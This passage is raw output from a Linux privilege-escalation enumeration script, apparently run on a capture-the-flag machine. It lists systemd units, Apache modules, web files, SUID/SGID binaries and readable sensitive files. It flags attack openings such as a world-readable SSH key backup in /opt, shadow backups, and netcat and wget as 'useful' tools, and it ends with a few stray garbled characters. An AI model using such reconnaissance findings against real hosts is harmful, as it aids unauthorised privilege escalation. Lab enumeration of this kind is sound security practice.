phpsessionclean.service -rw-r--r-- 1 root root 144 Jan 17 2018 phpsessionclean.timer -rw-r--r-- 1 root root 216 Jan 16 2018 ssh.socket -rw-r--r-- 1 root root 741 Dec 18 2017 accounts-daemon.service -rw-r--r-- 1 root root 251 Nov 16 2017 cron.service -rw-r--r-- 1 root root 266 Aug 15 2017 ufw.service -rw-r--r-- 1 root root 626 Nov 28 2016 ifup@.service -rw-r--r-- 1 root root 735 Nov 25 2016 networking.service -rw-r--r-- 1 root root 188 Feb 24 2014 rsync.service /lib/systemd/system/apache2.service.d: total 4.0K -rw-r--r-- 1 root root 42 Jul 16 2019 apache2-systemd.conf /lib/systemd/system/halt.target.wants: total 0 lrwxrwxrwx 1 root root 24 Apr 4 2019 plymouth-halt.service -> ../plymouth-halt.service /lib/systemd/system/initrd-switch-root.target.wants: total 0 lrwxrwxrwx 1 root root 25 Apr 4 2019 plymouth-start.service -> ../plymouth-start.service lrwxrwxrwx 1 root root 31 Apr 4 2019 plymouth-switch-root.service -> ../plymouth-switch-root.service /lib/systemd/system/kexec.target.wants: total 0 lrwxrwxrwx 1 root root 25 Apr 4 2019 plymouth-kexec.service -> ../plymouth-kexec.service /lib/systemd/system/multi-user.target.wants: total 0 lrwxrwxrwx 1 root root 15 Jul 22 2019 getty.target -> ../getty.target lrwxrwxrwx 1 root root 33 Jul 22 2019 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path lrwxrwxrwx 1 root root 25 Jul 22 2019 systemd-logind.service -> ../systemd-logind.service lrwxrwxrwx 1 root root 39 Jul 22 2019 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service lrwxrwxrwx 1 root root 32 Jul 22 2019 systemd-user-sessions.service -> ../systemd-user-sessions.service lrwxrwxrwx 1 root root 15 Jun 10 2019 dbus.service -> ../dbus.service lrwxrwxrwx 1 root root 24 Apr 4 2019 plymouth-quit.service -> ../plymouth-quit.service lrwxrwxrwx 1 root root 29 Apr 4 2019 plymouth-quit-wait.service -> ../plymouth-quit-wait.service /lib/systemd/system/poweroff.target.wants: total 0 lrwxrwxrwx 1 root root 28 Apr 4 2019 plymouth-poweroff.service -> ../plymouth-poweroff.service /lib/systemd/system/reboot.target.wants: total 0 lrwxrwxrwx 1 root root 26 Apr 4 2019 plymouth-reboot.service -> ../plymouth-reboot.service /lib/systemd/system/sysinit.target.wants: total 0 lrwxrwxrwx 1 root root 20 Jul 22 2019 cryptsetup.target -> ../cryptsetup.target lrwxrwxrwx 1 root root 22 Jul 22 2019 dev-hugepages.mount -> ../dev-hugepages.mount lrwxrwxrwx 1 root root 19 Jul 22 2019 dev-mqueue.mount -> ../dev-mqueue.mount lrwxrwxrwx 1 root root 28 Jul 22 2019 kmod-static-nodes.service -> ../kmod-static-nodes.service lrwxrwxrwx 1 root root 36 Jul 22 2019 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount lrwxrwxrwx 1 root root 32 Jul 22 2019 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount lrwxrwxrwx 1 root root 26 Jul 22 2019 sys-kernel-config.mount -> ../sys-kernel-config.mount lrwxrwxrwx 1 root root 25 Jul 22 2019 sys-kernel-debug.mount -> ../sys-kernel-debug.mount lrwxrwxrwx 1 root root 36 Jul 22 2019 systemd-ask-password-console.path -> ../systemd-ask-password-console.path lrwxrwxrwx 1 root root 25 Jul 22 2019 systemd-binfmt.service -> ../systemd-binfmt.service lrwxrwxrwx 1 root root 30 Jul 22 2019 systemd-hwdb-update.service -> ../systemd-hwdb-update.service lrwxrwxrwx 1 root root 27 Jul 22 2019 systemd-journald.service -> ../systemd-journald.service lrwxrwxrwx 1 root root 32 Jul 22 2019 systemd-journal-flush.service -> ../systemd-journal-flush.service lrwxrwxrwx 1 root root 36 Jul 22 2019 systemd-machine-id-commit.service -> ../systemd-machine-id-commit.service lrwxrwxrwx 1 root root 31 Jul 22 2019 systemd-modules-load.service -> ../systemd-modules-load.service lrwxrwxrwx 1 root root 30 Jul 22 2019 systemd-random-seed.service -> ../systemd-random-seed.service lrwxrwxrwx 1 root root 25 Jul 22 2019 systemd-sysctl.service -> ../systemd-sysctl.service lrwxrwxrwx 1 root root 37 Jul 22 2019 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service lrwxrwxrwx 1 root root 33 Jul 22 2019 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service lrwxrwxrwx 1 root root 24 Jul 22 2019 systemd-udevd.service -> ../systemd-udevd.service lrwxrwxrwx 1 root root 31 Jul 22 2019 systemd-udev-trigger.service -> ../systemd-udev-trigger.service lrwxrwxrwx 1 root root 30 Jul 22 2019 systemd-update-utmp.service -> ../systemd-update-utmp.service lrwxrwxrwx 1 root root 30 Apr 4 2019 plymouth-read-write.service -> ../plymouth-read-write.service lrwxrwxrwx 1 root root 25 Apr 4 2019 plymouth-start.service -> ../plymouth-start.service /lib/systemd/system/getty.target.wants: total 0 lrwxrwxrwx 1 root root 23 Jul 22 2019 getty-static.service -> ../getty-static.service /lib/systemd/system/graphical.target.wants: total 0 lrwxrwxrwx 1 root root 39 Jul 22 2019 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/local-fs.target.wants: total 0 lrwxrwxrwx 1 root root 29 Jul 22 2019 systemd-remount-fs.service -> ../systemd-remount-fs.service /lib/systemd/system/rescue.target.wants: total 0 lrwxrwxrwx 1 root root 39 Jul 22 2019 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/sockets.target.wants: total 0 lrwxrwxrwx 1 root root 25 Jul 22 2019 systemd-initctl.socket -> ../systemd-initctl.socket lrwxrwxrwx 1 root root 32 Jul 22 2019 systemd-journald-audit.socket -> ../systemd-journald-audit.socket lrwxrwxrwx 1 root root 34 Jul 22 2019 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket lrwxrwxrwx 1 root root 26 Jul 22 2019 systemd-journald.socket -> ../systemd-journald.socket lrwxrwxrwx 1 root root 31 Jul 22 2019 systemd-udevd-control.socket -> ../systemd-udevd-control.socket lrwxrwxrwx 1 root root 30 Jul 22 2019 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket lrwxrwxrwx 1 root root 14 Jun 10 2019 dbus.socket -> ../dbus.socket /lib/systemd/system/timers.target.wants: total 0 lrwxrwxrwx 1 root root 31 Jul 22 2019 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer /lib/systemd/system/rc-local.service.d: total 4.0K -rw-r--r-- 1 root root 290 Jul 22 2019 debian.conf /lib/systemd/system/user@.service.d: total 4.0K -rw-r--r-- 1 root root 125 Jul 22 2019 timeout.conf /lib/systemd/system/runlevel1.target.wants: total 0 /lib/systemd/system/runlevel2.target.wants: total 0 /lib/systemd/system/runlevel3.target.wants: total 0 /lib/systemd/system/runlevel4.target.wants: total 0 /lib/systemd/system/runlevel5.target.wants: total 0 /lib/systemd/system-generators: total 200K -rwxr-xr-x 1 root root 23K Jul 22 2019 systemd-cryptsetup-generator -rwxr-xr-x 1 root root 10K Jul 22 2019 systemd-debug-generator -rwxr-xr-x 1 root root 31K Jul 22 2019 systemd-fstab-generator -rwxr-xr-x 1 root root 14K Jul 22 2019 systemd-getty-generator -rwxr-xr-x 1 root root 26K Jul 22 2019 systemd-gpt-auto-generator -rwxr-xr-x 1 root root 10K Jul 22 2019 systemd-hibernate-resume-generator -rwxr-xr-x 1 root root 10K Jul 22 2019 systemd-rc-local-generator -rwxr-xr-x 1 root root 10K Jul 22 2019 systemd-system-update-generator -rwxr-xr-x 1 root root 31K Jul 22 2019 systemd-sysv-generator -rwxr-xr-x 1 root root 14K Jul 22 2019 systemd-veritysetup-generator -rwxr-xr-x 1 root root 286 Jun 21 2019 friendly-recovery /lib/systemd/system-sleep: total 4.0K -rwxr-xr-x 1 root root 92 Feb 22 2018 hdparm /lib/systemd/network: total 16K -rw-r--r-- 1 root root 645 Jan 28 2018 80-container-host0.network -rw-r--r-- 1 root root 718 Jan 28 2018 80-container-ve.network -rw-r--r-- 1 root root 704 Jan 28 2018 80-container-vz.network -rw-r--r-- 1 root root 412 Jan 28 2018 99-default.link /lib/systemd/system-preset: total 4.0K -rw-r--r-- 1 root root 951 Jan 28 2018 90-systemd.preset /lib/systemd/system-shutdown: total 0 ### SOFTWARE ############################################# [-] Sudo version: Sudo version 1.8.21p2 [-] Apache version: Server version: Apache/2.4.29 (Ubuntu) Server built: 2019-07-16T18:14:45 [-] Apache user configuration: APACHE_RUN_USER=www-data APACHE_RUN_GROUP=www-data [-] Installed Apache modules: Loaded Modules: core_module (static) so_module (static) watchdog_module (static) http_module (static) log_config_module (static) logio_module (static) version_module (static) unixd_module (static) access_compat_module (shared) actions_module (shared) alias_module (shared) auth_basic_module (shared) authn_core_module (shared) authn_file_module (shared) authz_core_module (shared) authz_host_module (shared) authz_user_module (shared) autoindex_module (shared) deflate_module (shared) dir_module (shared) env_module (shared) filter_module (shared) mime_module (shared) mpm_prefork_module (shared) negotiation_module (shared) php7_module (shared) reqtimeout_module (shared) rewrite_module (shared) setenvif_module (shared) status_module (shared) [-] www home dir contents: /var/www/: total 20K drwxr-xr-x 3 root root 4.0K Aug 25 2019 . drwxr-xr-x 13 root root 4.0K Aug 25 2019 .. drwxr-xr-x 7 root root 4.0K Aug 26 2019 html -rw-r--r-- 1 root root 22 Aug 25 2019 nikto-test-pFTYNhZX.html -rw-rw-r-- 1 Matt Matt 482 Aug 25 2019 SimpleHTTPPutServer.py /var/www/html: total 56K drwxr-xr-x 7 root root 4.0K Aug 26 2019 . drwxr-xr-x 3 root root 4.0K Aug 25 2019 .. drwxr-xr-x 2 root root 4.0K Aug 25 2019 css drwxr-xr-x 2 root root 4.0K Apr 23 2019 fonts drwxr-xr-x 3 root root 4.0K Apr 23 2019 images -rw-r--r-- 1 root root 3.8K Aug 25 2019 index.html drwxr-xr-x 2 root root 4.0K Apr 23 2019 js -rw-r--r-- 1 root root 24K Aug 25 2019 style.css drwxr-xr-x 2 root root 4.0K Aug 26 2019 upload /var/www/html/css: total 608K drwxr-xr-x 2 root root 4.0K Aug 25 2019 . drwxr-xr-x 7 root root 4.0K Aug 26 2019 .. -rw-r--r-- 1 root root 25K Mar 8 2018 all.css -rw-r--r-- 1 root root 24K Jul 17 2017 animate.css -rw-r--r-- 1 root root 53K Aug 2 2016 animate.min.css -rw-r--r-- 1 root root 188K Aug 13 2017 bootstrap.css -rw-r--r-- 1 root root 25K Jan 6 2017 bootstrap-grid.css -rw-r--r-- 1 root root 19K Jan 6 2017 bootstrap-grid.min.css -rw-r--r-- 1 root root 148K Jan 6 2017 bootstrap.min.css -rw-r--r-- 1 root root 5.8K Jan 6 2017 bootstrap-reboot.css -rw-r--r-- 1 root root 4.6K Jan 6 2017 bootstrap-reboot.min.css -rw-r--r-- 1 root root 3.8K Oct 29 2017 carousel.css -rw-r--r-- 1 root root 4.5K Mar 8 2018 colors.css -rw-r--r-- 1 root root 37K May 23 2017 font-awesome.css -rw-r--r-- 1 root root 31K May 23 2017 font-awesome.min.css -rw-r--r-- 1 root root 3.7K Oct 20 2017 lightbox.css -rw-r--r-- 1 root root 3.7K Mar 8 2018 responsive.css /var/www/html/fonts: total 1.2M drwxr-xr-x 2 root root 4.0K Apr 23 2019 . drwxr-xr-x 7 root root 4.0K Aug 26 2019 .. -rw-r--r-- 1 root root 1.5K Nov 6 2017 flaticon.css -rw-r--r-- 1 root root 7.9K Nov 6 2017 Flaticon.eot -rw-r--r-- 1 root root 49K Nov 6 2017 Flaticon.svg -rw-r--r-- 1 root root 7.7K Nov 6 2017 Flaticon.ttf -rw-r--r-- 1 root root 5.3K Nov 6 2017 Flaticon.woff -rw-r--r-- 1 root root 132K May 23 2017 FontAwesome.otf -rw-r--r-- 1 root root 162K May 23 2017 fontawesome-webfont.eot -rw-r--r-- 1 root root 434K May 23 2017 fontawesome-webfont.svg -rw-r--r-- 1 root root 162K May 23 2017 fontawesome-webfont.ttf -rw-r--r-- 1 root root 96K May 23 2017 fontawesome-webfont.woff -rw-r--r-- 1 root root 76K May 23 2017 fontawesome-webfont.woff2 /var/www/html/images: total 60K drwxr-xr-x 3 root root 4.0K Apr 23 2019 . drwxr-xr-x 7 root root 4.0K Aug 26 2019 .. -rw-r--r-- 1 root root 1.7K Oct 19 2017 apple-touch-icon.png -rw-r--r-- 1 root root 34K Oct 19 2017 favicon.ico -rw-r--r-- 1 root root 1.5K Oct 15 2017 flogo.png drwxr-xr-x 2 root root 4.0K Apr 23 2019 icons -rw-r--r-- 1 root root 2.2K Oct 22 2017 logo.png /var/www/html/images/icons: total 20K drwxr-xr-x 2 root root 4.0K Apr 23 2019 . drwxr-xr-x 3 root root 4.0K Apr 23 2019 .. -rw-r--r-- 1 root root 3.7K Oct 15 2017 icon_01.png -rw-r--r-- 1 root root 3.1K Oct 15 2017 icon_02.png -rw-r--r-- 1 root root 3.8K Oct 15 2017 icon_03.png /var/www/html/js: total 556K drwxr-xr-x 2 root root 4.0K Apr 23 2019 . drwxr-xr-x 7 root root 4.0K Aug 26 2019 .. -rw-r--r-- 1 root root 59K Mar 8 2018 all.js -rw-r--r-- 1 root root 8.9K Jul 17 2017 animate.js -rw-r--r-- 1 root root 121K Aug 14 2017 bootstrap.js -rw-r--r-- 1 root root 69K Aug 14 2017 bootstrap.min.js -rw-r--r-- 1 root root 84K Oct 29 2017 carousel.js -rw-r--r-- 1 root root 2.3K Mar 8 2018 custom.js -rw-r--r-- 1 root root 95K Jun 27 2017 jquery.min.js -rw-r--r-- 1 root root 18K Oct 20 2017 lightbox.js -rw-r--r-- 1 root root 51K Oct 19 2017 parallax.js -rw-r--r-- 1 root root 23K Jun 30 2017 tether.min.js /var/www/html/upload: total 1.1M drwxr-xr-x 2 root root 4.0K Aug 26 2019 . drwxr-xr-x 7 root root 4.0K Aug 26 2019 .. -rw-r--r-- 1 root root 577K Apr 20 2018 Cyber-security-web-banner.jpg -rw-r--r-- 1 root root 44K Mar 8 2018 demo-bg.jpg -rw-r--r-- 1 root root 4.2K Mar 8 2018 device_02.png -rw-r--r-- 1 root root 33K Mar 8 2018 hero_01.jpg -rw-r--r-- 1 root root 5.3K Mar 8 2018 insta_01.jpg -rw-r--r-- 1 root root 5.3K Mar 8 2018 insta_02.jpg -rw-r--r-- 1 root root 5.3K Mar 8 2018 insta_03.jpg -rw-r--r-- 1 root root 5.3K Mar 8 2018 insta_04.jpg -rw-r--r-- 1 root root 5.3K Mar 8 2018 insta_05.jpg -rw-r--r-- 1 root root 5.3K Mar 8 2018 insta_06.jpg -rw-r--r-- 1 root root 5.3K Mar 8 2018 insta_07.jpg -rw-r--r-- 1 root root 5.3K Mar 8 2018 insta_08.jpg -rw-r--r-- 1 root root 5.3K Mar 8 2018 insta_09.jpg -rw-r--r-- 1 root root 5.3K Mar 8 2018 insta_10.jpg -rw-r--r-- 1 root root 1.4K Mar 8 2018 logo_01.png -rw-r--r-- 1 root root 1.4K Mar 8 2018 logo_02.png -rw-r--r-- 1 root root 1.4K Mar 8 2018 logo_03.png -rw-r--r-- 1 root root 1.4K Mar 8 2018 logo_04.png -rw-r--r-- 1 root root 1.4K Mar 8 2018 logo_05.png -rw-r--r-- 1 root root 1.4K Mar 8 2018 logo_06.png -rw-r--r-- 1 root root 9.6K Mar 8 2018 menu-banner_01.jpg -rw-r--r-- 1 root root 11K Mar 8 2018 menu-banner.jpg -rw-r--r-- 1 root root 43K Mar 8 2018 parallax_01.jpg -rw-r--r-- 1 root root 37K Mar 8 2018 parallax_02.jpg -rw-r--r-- 1 root root 20K Mar 8 2018 screen_01.jpg -rw-r--r-- 1 root root 20K Mar 8 2018 screen_02.jpg -rw-r--r-- 1 root root 20K Mar 8 2018 screen_03.jpg -rw-r--r-- 1 root root 15K Mar 8 2018 service_01.jpg -rw-r--r-- 1 root root 15K Mar 8 2018 service_02.jpg -rw-r--r-- 1 root root 15K Mar 8 2018 service_03.jpg -rw-r--r-- 1 root root 9.6K Mar 8 2018 team_01.jpg -rw-r--r-- 1 root root 9.6K Mar 8 2018 team_02.jpg -rw-r--r-- 1 root root 9.6K Mar 8 2018 team_03.jpg -rw-r--r-- 1 root root 16K Mar 8 2018 work_01.jpg -rw-r--r-- 1 root root 16K Mar 8 2018 work_02.jpg -rw-r--r-- 1 root root 16K Mar 8 2018 work_03.jpg ### INTERESTING FILES #################################### [-] Useful file locations: /bin/nc /bin/netcat /usr/bin/wget /usr/bin/gcc [-] Installed compilers: ii g++ 4:7.4.0-1ubuntu2.3 amd64 GNU C++ compiler ii g++-7 7.4.0-1ubuntu1~18.04.1 amd64 GNU C++ compiler ii gcc 4:7.4.0-1ubuntu2.3 amd64 GNU C compiler ii gcc-7 7.4.0-1ubuntu1~18.04.1 amd64 GNU C compiler [-] Can we read/write sensitive files: -rw-r--r-- 1 root root 1382 Aug 25 2019 /etc/passwd -rw-r--r-- 1 root root 709 Oct 25 2019 /etc/group -rw-r--r-- 1 root root 581 Apr 9 2018 /etc/profile -rw-r----- 1 root shadow 935 Aug 26 2019 /etc/shadow [-] SUID files: -rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-- 1 root messagebus 42992 Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 149080 Jan 18 2018 /usr/bin/sudo -rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd -rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd -rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn -rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils -rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp -rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount -rwsr-xr-x 1 root root 26696 Oct 15 2018 /bin/umount -rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su -rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping -rwsr-xr-x 1 root root 43088 Oct 15 2018 /bin/mount [-] SGID files: -rwxr-sr-x 1 root shadow 34816 Feb 27 2019 /sbin/pam_extrausers_chkpwd -rwxr-sr-x 1 root shadow 34816 Feb 27 2019 /sbin/unix_chkpwd -rwxr-sr-x 1 root shadow 22808 Mar 22 2019 /usr/bin/expiry -rwxr-sr-x 1 root crontab 39352 Nov 16 2017 /usr/bin/crontab -rwxr-sr-x 1 root ssh 362640 Mar 4 2019 /usr/bin/ssh-agent -rwxr-sr-x 1 root mlocate 43088 Mar 1 2018 /usr/bin/mlocate -rwxr-sr-x 1 root tty 14328 Jan 17 2018 /usr/bin/bsd-write -rwxr-sr-x 1 root tty 30800 Oct 15 2018 /usr/bin/wall -rwxr-sr-x 1 root shadow 71816 Mar 22 2019 /usr/bin/chage [+] Files with POSIX capabilities set: /usr/bin/mtr-packet = cap_net_raw+ep [-] NFS displaying partitions and filesystems - you need to check if exotic filesystems # /etc/fstab: static file system information. # # Use 'blkid' to print the universally unique identifier for a # device; this may be used with UUID= as a more robust way to name devices # that works even if disks are added and removed. See fstab(5). # # <file system> <mount point> <type> <options> <dump> <pass> # / was on /dev/sda1 during installation UUID=9687c60d-cb06-4f55-9bdc-08678a8f805c / ext4 errors=remount-ro 0 1 /swapfile none swap sw 0 0 [-] Can't search *.conf files as no keyword was entered [-] Can't search *.php files as no keyword was entered [-] Can't search *.log files as no keyword was entered [-] Can't search *.ini files as no keyword was entered [-] All *.conf files in /etc (recursive 1 level): -rw-r--r-- 1 root root 2683 Jan 17 2018 /etc/sysctl.conf -rw-r--r-- 1 root root 703 Aug 21 2017 /etc/logrotate.conf -rw-r--r-- 1 root root 1260 Feb 26 2018 /etc/ucf.conf -rw-r--r-- 1 root root 191 Feb 7 2018 /etc/libaudit.conf -rw-r--r-- 1 root root 2969 Feb 28 2018 /etc/debconf.conf -rw-r--r-- 1 root root 552 Apr 4 2018 /etc/pam.conf -rw-r--r-- 1 root root 144 Aug 24 2019 /etc/kernel-img.conf -rw-r--r-- 1 root root 4861 Feb 22 2018 /etc/hdparm.conf -rw-r--r-- 1 root root 92 Apr 9 2018 /etc/host.conf -rw-r--r-- 1 root root 280 Jun 20 2014 /etc/fuse.conf -rw-r--r-- 1 root root 1358 Jan 30 2018 /etc/rsyslog.conf -rw-r--r-- 1 root root 403 Mar 1 2018 /etc/updatedb.conf -rw-r--r-- 1 root root 350 Aug 24 2019 /etc/popularity-contest.conf -rw-r--r-- 1 root root 5898 Aug 24 2019 /etc/ca-certificates.conf -rw-r--r-- 1 root root 2584 Feb 1 2018 /etc/gai.conf -rw-r--r-- 1 root root 513 Aug 24 2019 /etc/nsswitch.conf -rw-r--r-- 1 root root 14867 Oct 13 2016 /etc/ltrace.conf -rw-r--r-- 1 root root 3028 Aug 24 2019 /etc/adduser.conf -rw-r--r-- 1 root root 604 Aug 13 2017 /etc/deluser.conf -rw-r--r-- 1 root root 34 Jan 27 2016 /etc/ld.so.conf -rw-r--r-- 1 root root 812 Mar 24 2018 /etc/mke2fs.conf [-] Current user's history files: -rw------- 1 redis redis 399 Oct 25 2019 /var/lib/redis/.bash_history [-] Location and contents (if accessible) of .bash_history file(s): /home/Matt/.bash_history [-] Location and Permissions (if accessible) of .bak file(s): -rwxr-xr-x 1 Matt Matt 1743 Aug 26 2019 /opt/id_rsa.bak -rw------- 1 root root 695 Aug 25 2019 /var/backups/group.bak -rw------- 1 root shadow 577 Aug 25 2019 /var/backups/gshadow.bak -rw------- 1 root shadow 935 Aug 26 2019 /var/backups/shadow.bak -rw------- 1 root root 1382 Aug 25 2019 /var/backups/passwd.bak [-] Any interesting mail in /var/mail: total 8 drwxrwsr-x 2 root mail 4096 Aug 24 2019 . drwxr-xr-x 13 root root 4096 Aug 25 2019 .. ### SCAN COMPLETE ####################################custom-colorsXAIZ|xA.!zn